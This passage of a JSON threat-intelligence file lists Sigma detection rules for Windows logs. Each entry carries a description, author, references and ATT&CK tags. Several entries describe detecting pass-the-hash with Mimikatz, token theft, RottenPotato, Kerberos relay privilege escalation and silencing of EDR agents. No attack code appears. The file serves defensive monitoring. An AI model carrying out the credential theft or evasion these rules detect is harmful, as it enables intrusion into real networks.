"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" ], "tags": [ "attack.discovery", "attack.t1010" ] }, "related": [ { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", "value": "SCM Database Handle Failure" }, { "description": "Detects successful logon attempts performed with WMI", "meta": { "author": "Thomas Patzke", "creation_date": "2019-12-04", "falsepositive": [ "Monitoring tools", "Legitimate system administration" ], "filename": "win_security_susp_wmi_login.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_wmi_login.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5af54681-df95-4c26-854f-2565e13cfab0", "value": "Successful Account Login Via WMI" }, { "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", "meta": { "author": "@SBousseaden, Florian Roth", "creation_date": "2019-11-15", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_rottenpotato.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1195284233729777665", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_rottenpotato.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "value": "RottenPotato Like Attack Pattern" }, { "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.", "meta": { "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate or intentional inbound connections from public IP addresses on the SMB port." ], "filename": "win_security_successful_external_remote_smb_login.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1133", "attack.t1078", "attack.t1110" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc", "value": "External Remote SMB Logon from Public IP" }, { "description": "RDP login with localhost source address may be a tunnelled login", "meta": { "author": "Thomas Patzke", "creation_date": "2019-01-28", "falsepositive": [ "Unknown" ], "filename": "win_security_rdp_localhost_login.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml" ], "tags": [ "attack.lateral-movement", "car.2013-07-002", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", "value": "RDP Login from Localhost" }, { "description": "Detect remote login by Administrator user (depending on internal pattern).", "meta": { "author": "juju4", "creation_date": "2017-10-29", "falsepositive": [ "Legitimate administrative activity." ], "filename": "win_security_admin_rdp_login.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://car.mitre.org/wiki/CAR-2016-04-005", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml" ], "tags": [ "attack.lateral-movement", "attack.t1078.001", "attack.t1078.002", "attack.t1078.003", "car.2016-04-005" ] }, "related": [ { "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", "value": "Admin User Remote Logon" }, { "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", "meta": { "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "creation_date": "2019-06-02", "falsepositive": [ "Unlikely" ], "filename": "win_security_rdp_bluekeep_poc_scanner.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708", "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml" ], "tags": [ "attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8400629e-79a9-4737-b387-5db940ab2367", "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln" }, { "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", "meta": { "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "creation_date": "2018-02-12", "falsepositive": [ "Runas command-line tool using /netonly parameter" ], "filename": "win_security_overpass_the_hash.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml" ], "tags": [ "attack.lateral-movement", "attack.s0002", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", "value": "Successful Overpass the Hash Attempt" }, { "description": "Detects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.", "meta": { "author": "NVISO", "creation_date": "2020-05-06", "falsepositive": [ "Legitimate logon attempts over the internet", "IPv4-to-IPv6 mapped IPs" ], "filename": "win_security_susp_failed_logon_source.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4625", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.t1078", "attack.t1190", "attack.t1133" ] }, "related": [ { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", "value": "Failed Logon From Public IP" }, { "description": "Detects potential token impersonation and theft. Example, when using \"DuplicateToken(Ex)\" and \"ImpersonateLoggedOnUser\" with the \"LOGON32_LOGON_NEW_CREDENTIALS flag\".", "meta": { "author": "Michaela Adams, Zach Mathis", "creation_date": "2022-11-06", "falsepositive": [ "Anti-Virus" ], "filename": "win_security_access_token_abuse.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.elastic.co/fr/blog/how-attackers-abuse-access-token-manipulation", "https://www.manageengine.com/log-management/cyber-security/access-token-manipulation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_access_token_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1134.001", "stp.4u" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", "value": "Potential Access Token Abuse" }, { "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-03", "falsepositive": [ "Unlikely" ], "filename": "win_security_diagtrack_eop_default_login_username.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196", "value": "DiagTrackEoP Default Login Username" }, { "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", "meta": { "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", "creation_date": "2019-06-14", "falsepositive": [ "Administrator activity" ], "filename": "win_security_pass_the_hash_2.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", "https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml" ], "tags": [ "attack.lateral-movement", "attack.t1550.002" ] }, "related": [ { "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", "value": "Pass the Hash Activity 2" }, { "description": "Detects activity when a security-enabled global group is deleted", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_security_enabled_global_group_deleted.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b237c54b-0f15-4612-a819-44b735e0de27", "value": "A Security-Enabled Global Group Was Deleted" }, { "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.", "meta": { "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)", "creation_date": "2023-01-19", "falsepositive": [ "Legitimate or intentional inbound connections from public IP addresses on the RDP port." ], "filename": "win_security_successful_external_remote_rdp_login.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Purp1eW0lf/status/1616144561965002752", "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml" ], "tags": [ "attack.initial-access", "attack.credential-access", "attack.t1133", "attack.t1078", "attack.t1110" ] }, "related": [ { "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2", "value": "External Remote RDP Logon from Public IP" }, { "description": "Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account.\nThis may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.\n", "meta": { "author": "Elastic, @SBousseaden", "creation_date": "2022-04-27", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_privesc_kerberos_relay_over_ldap.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", "https://github.com/elastic/detection-rules/blob/5fe7833312031a4787e07893e27e4ea7a7665745/rules/_deprecated/privilege_escalation_krbrelayup_suspicious_logon.toml#L38", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_privesc_kerberos_relay_over_ldap.yml" ], "tags": [ "attack.privilege-escalation", "attack.credential-access", "attack.t1548" ] }, "related": [ { "dest-uuid": "67720091-eee3-4d2d-ae16-8264567f6f5b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", "value": "Potential Privilege Escalation via Local Kerberos Relay over LDAP" }, { "description": "Detects logon events that specify new credentials", "meta": { "author": "Max Altgelt (Nextron Systems)", "creation_date": "2022-04-06", "falsepositive": [ "Legitimate remote administration activity" ], "filename": "win_security_susp_logon_newcredentials.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml" ], "tags": [ "attack.defense-evasion", "attack.lateral-movement", "attack.t1550" ] }, "related": [ { "dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", "value": "Outgoing Logon with New Credentials" }, { "description": "Detects activity when a member is removed from a security-enabled global group", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_member_removed_security_enabled_global_group.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_removed_security_enabled_global_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "02c39d30-02b5-45d2-b435-8aebfe5a8629", "value": "A Member Was Removed From a Security-Enabled Global Group" }, { "description": "Detects activity when a member is added to a security-enabled global group", "meta": { "author": "Alexandr Yampolskyi, SOC Prime", "creation_date": "2023-04-26", "falsepositive": [ "Unknown" ], "filename": "win_security_member_added_security_enabled_global_group.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", "https://www.cisecurity.org/controls/cis-controls-list/", "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c43c26be-2e87-46c7-8661-284588c5a53e", "value": "A Member Was Added to a Security-Enabled Global Group" }, { "description": "Detects a Windows Filtering Platform (WFP) blocked connection event involving common Endpoint Detection and Response (EDR) agents.\nAdversaries may use WFP filters to prevent Endpoint Detection and Response (EDR) agents from reporting security events.\n", "meta": { "author": "@gott_cyber", "creation_date": "2024-01-08", "falsepositive": [ "Unlikely" ], "filename": "win_security_wfp_endpoint_agent_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/netero1010/EDRSilencer", "https://ghoulsec.medium.com/misc-series-4-forensics-on-edrsilencer-events-428b20b3f983", "https://github.com/amjcyber/EDRNoiseMaker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/object_access/win_security_wfp_endpoint_agent_blocked.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bacf58c6-e199-4040-a94f-95dea0f1e45a", "value": "Windows Filtering Platform Blocked Connection From EDR Agent Binary" }, { "description": "Detects the load of a revoked kernel driver", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_driver_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "320fccbf-5e32-4101-82b8-2679c5f007c6", "value": "CodeIntegrity - Revoked Kernel Driver Loaded" }, { "description": "Detects loaded kernel modules that did not meet the WHQL signing requirements.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_whql_failure.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_whql_failure.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "2f8cd7a0-9d5a-4f62-9f8b-2c951aa0dd1f", "value": "CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module" }, { "description": "Detects image load events with revoked certificates by code integrity.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_image_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "881b7725-47cc-4055-8000-425823344c59", "value": "CodeIntegrity - Revoked Image Loaded" }, { "description": "Detects blocked image load events with revoked certificates by code integrity.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_revoked_image_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_image_blocked.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "6f156c48-3894-4952-baf0-16193e9067d2", "value": "CodeIntegrity - Blocked Image Load With Revoked Certificate" }, { "description": "Detects block events for files that are disallowed by code integrity for protected processes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_blocked_protected_process_file.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_protected_process_file.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "5daf11c3-022b-4969-adb9-365e6c078c7c", "value": "CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked" }, { "description": "Detects the presence of a loaded unsigned kernel module on the system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_unsigned_driver_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_driver_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "951f8d29-f2f6-48a7-859f-0673ff105e6f", "value": "CodeIntegrity - Unsigned Kernel Module Loaded" }, { "description": "Detects blocked load attempts of revoked drivers", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unknown" ], "filename": "win_codeintegrity_revoked_driver_blocked.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "value": "CodeIntegrity - Blocked Driver Load With Revoked Certificate" }, { "description": "Detects loaded unsigned image on the system", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-06-06", "falsepositive": [ "Unlikely" ], "filename": "win_codeintegrity_unsigned_image_loaded.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "Internal Research", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_unsigned_image_loaded.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "c92c24e7-f595-493f-9c98-53d5142f5c18", "value": "CodeIntegrity - Unsigned Image Loaded" }, { "description": "Detects attempted file load events that did not meet the signing level requirements. It often means the file's signature is revoked or a signature with the Lifetime Signing EKU has expired.\nThis event is best correlated with EID 3089 to determine the error of the validation.\n", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Antivirus and other third party products are known to trigger this rule quite a lot. Initial filters and tuning is required before using this rule." ], "filename": "win_codeintegrity_attempted_dll_load.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-tag-explanations", "https://twitter.com/SBousseaden/status/1483810148602814466", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml" ], "tags": [ "attack.execution" ] }, "uuid": "f8931561-97f5-4c46-907f-0a4a592e47a7", "value": "CodeIntegrity - Unmet Signing Level Requirements By File Under Validation" }, { "description": "Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-11-10", "falsepositive": [ "Unknown" ], "filename": "win_codeintegrity_enforced_policy_block.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations", "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log", "https://twitter.com/wdormann/status/1590434950335320065", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543" ] }, "related": [ { "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e4be5675-4a53-426a-8c81-a8bb2387e947", "value": "CodeIntegrity - Blocked Image/Driver Load For Policy Violation" }, { "description": "Detects logons using NTLM to hosts that are potentially not part of the domain.", "meta": { "author": "James Pemberton", "creation_date": "2020-05-22", "falsepositive": [ "Host connections to valid domains, exclude these.", "Host connections not using host FQDN.", "Host connections to external legitimate domains." ], "filename": "win_susp_ntlm_rdp.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "n/a", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ce5678bb-b9aa-4fb5-be4b-e57f686256ad", "value": "Potential Remote Desktop Connection to Non-Domain Host" }, { "description": "Detects common NTLM brute force device names", "meta": { "author": "Jerry Shockley '@jsh0x'", "creation_date": "2022-02-02", "falsepositive": [ "Systems with names equal to the spoofed ones used by the brute force tools" ], "filename": "win_susp_ntlm_brute_force.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.varonis.com/blog/investigate-ntlm-brute-force", 